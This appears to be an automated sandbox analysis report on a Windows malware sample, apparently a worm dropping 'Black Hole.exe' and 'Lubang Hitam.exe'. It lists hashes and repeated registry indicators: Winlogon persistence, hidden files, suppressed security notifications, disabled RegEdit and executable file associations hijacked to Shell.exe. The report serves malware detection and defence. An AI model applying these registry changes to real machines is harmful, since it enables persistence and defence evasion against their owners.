Analysis
-
max time kernel
149s -
max time network
102s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
01-06-2024 03:52
Static task
static1
Behavioral task
behavioral1
Sample
d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe
Resource
win10v2004-20240426-en
General
-
Target
d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe
-
Size
70KB
-
MD5
2fd685a44814d363e81a07de7bee5233
-
SHA1
a9170c0738cf9f0d746ff409907f13a93f0baf04
-
SHA256
d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c
-
SHA512
5bfddc19d55b0377410e1681de30336956f9f9f59b26f8237863079b7b0df0d05aec773ea5e3045dba3b5bed4109b536c75a171d356494285a8a5dd498c87bf5
-
SSDEEP
768:1iCHI1nffAkGisSQ6KRcJZOYoBudWaDyqzlL49FLdS5yA+jz+CEo+R5nOwekfZUW:1LHIlfH7Q6qRBwWa2qxQFZA+j6/Ww+9
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 18 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe \"C:\\Windows\\system32\\Lubang Hitam.exe\"" Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Lubang Hitam.exe" Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Lubang Hitam.exe" WINLOGON.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe \"C:\\Windows\\system32\\Lubang Hitam.exe\"" CSRSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Lubang Hitam.exe" CSRSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Lubang Hitam.exe" Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe \"C:\\Windows\\system32\\Lubang Hitam.exe\"" SERVICES.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Lubang Hitam.exe" SERVICES.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Lubang Hitam.exe" LSASS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe \"C:\\Windows\\system32\\Lubang Hitam.exe\"" LSASS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe \"C:\\Windows\\system32\\Lubang Hitam.exe\"" SMSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Lubang Hitam.exe" SMSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe \"C:\\Windows\\system32\\Lubang Hitam.exe\"" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Lubang Hitam.exe" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe \"C:\\Windows\\system32\\Lubang Hitam.exe\"" Lubang Hitam.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Lubang Hitam.exe" Lubang Hitam.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe \"C:\\Windows\\system32\\Lubang Hitam.exe\"" WINLOGON.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "Explorer.exe \"C:\\Windows\\system32\\Lubang Hitam.exe\"" Black Hole.exe -
Modifies visibility of file extensions in Explorer 2 TTPs 9 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" LSASS.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" Black Hole.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" SMSS.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" Black Hole.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" Lubang Hitam.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" WINLOGON.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" CSRSS.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" SERVICES.EXE -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 9 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" CSRSS.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" SERVICES.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" LSASS.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" SMSS.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" Black Hole.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" Lubang Hitam.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" WINLOGON.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" Black Hole.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" WINLOGON.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" LSASS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" CSRSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" LSASS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" SMSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" WINLOGON.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" CSRSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" SMSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" Lubang Hitam.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" Lubang Hitam.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" WINLOGON.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" SMSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" CSRSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" LSASS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" Lubang Hitam.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" SERVICES.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" SERVICES.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" SERVICES.EXE -
Disables RegEdit via registry modification 18 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" SMSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" SMSS.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Lubang Hitam.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Lubang Hitam.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" WINLOGON.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" CSRSS.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" LSASS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" SERVICES.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Black Hole.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Black Hole.exe Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" WINLOGON.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" SERVICES.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" LSASS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" CSRSS.EXE -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Executes dropped EXE 56 IoCs
pid Process 2584 Black Hole.exe 4040 Lubang Hitam.exe 3820 WINLOGON.EXE 816 CSRSS.EXE 3496 SERVICES.EXE 2248 LSASS.EXE 4632 SMSS.EXE 4692 Black Hole.exe 1776 Black Hole.exe 1952 Lubang Hitam.exe 2264 WINLOGON.EXE 4768 Lubang Hitam.exe 5096 CSRSS.EXE 2100 Black Hole.exe 4840 WINLOGON.EXE 4784 Lubang Hitam.exe 2460 Black Hole.exe 3320 SERVICES.EXE 2156 CSRSS.EXE 3104 WINLOGON.EXE 2180 LSASS.EXE 2092 Lubang Hitam.exe 4064 WINLOGON.EXE 1372 Black Hole.exe 4032 CSRSS.EXE 4572 SERVICES.EXE 940 SMSS.EXE 4152 Lubang Hitam.exe 1400 LSASS.EXE 4964 CSRSS.EXE 1952 SERVICES.EXE 4740 WINLOGON.EXE 1732 SMSS.EXE 3216 LSASS.EXE 4924 SERVICES.EXE 2704 CSRSS.EXE 4080 SMSS.EXE 4424 LSASS.EXE 1852 SMSS.EXE 2920 Black Hole.exe 3044 SERVICES.EXE 888 Lubang Hitam.exe 2100 LSASS.EXE 4780 WINLOGON.EXE 3360 SMSS.EXE 4452 CSRSS.EXE 3016 SERVICES.EXE 1820 Black Hole.exe 1396 LSASS.EXE 2452 Lubang Hitam.exe 2060 SMSS.EXE 116 WINLOGON.EXE 320 CSRSS.EXE 4800 SERVICES.EXE 1464 LSASS.EXE 4328 SMSS.EXE -
Loads dropped DLL 7 IoCs
pid Process 4692 Black Hole.exe 1776 Black Hole.exe 2100 Black Hole.exe 2460 Black Hole.exe 1372 Black Hole.exe 2920 Black Hole.exe 1820 Black Hole.exe -
Modifies system executable filetype association 2 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" CSRSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\ = "File Folder" Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\ = "File Folder" Black Hole.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command SMSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" WINLOGON.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" LSASS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command SMSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" WINLOGON.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command SERVICES.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command SERVICES.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command Black Hole.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command Lubang Hitam.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" Lubang Hitam.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command Black Hole.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command Black Hole.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command SERVICES.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" WINLOGON.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command WINLOGON.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" SERVICES.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" SMSS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command Black Hole.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" Black Hole.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command SERVICES.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command LSASS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command LSASS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command WINLOGON.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" LSASS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command SMSS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command SMSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" SERVICES.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" Black Hole.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command CSRSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\ = "File Folder" CSRSS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command LSASS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" SMSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" CSRSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\piffile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" SERVICES.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" SERVICES.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" LSASS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" Black Hole.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command CSRSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" CSRSS.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" Black Hole.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command Lubang Hitam.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" LSASS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command Lubang Hitam.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" CSRSS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command WINLOGON.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command SMSS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command Black Hole.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command Black Hole.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\comfile\shell\open\command\ = "\"C:\\Windows\\system32\\Shell.exe\" \"%1\" %*" SMSS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shell\open d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" SMSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" Black Hole.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\ Lubang Hitam.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\ WINLOGON.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" WINLOGON.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" WINLOGON.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" CSRSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" CSRSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" d82cefe294d40ccf445218475806acc484245716c4ddaff04facc27fa0c2e28c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" Lubang Hitam.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" WINLOGON.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" LSASS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\ SMSS.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" SMSS.EXE Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\ Black Hole.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" Lubang Hitam.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" SERVICES.EXE Set value (int) 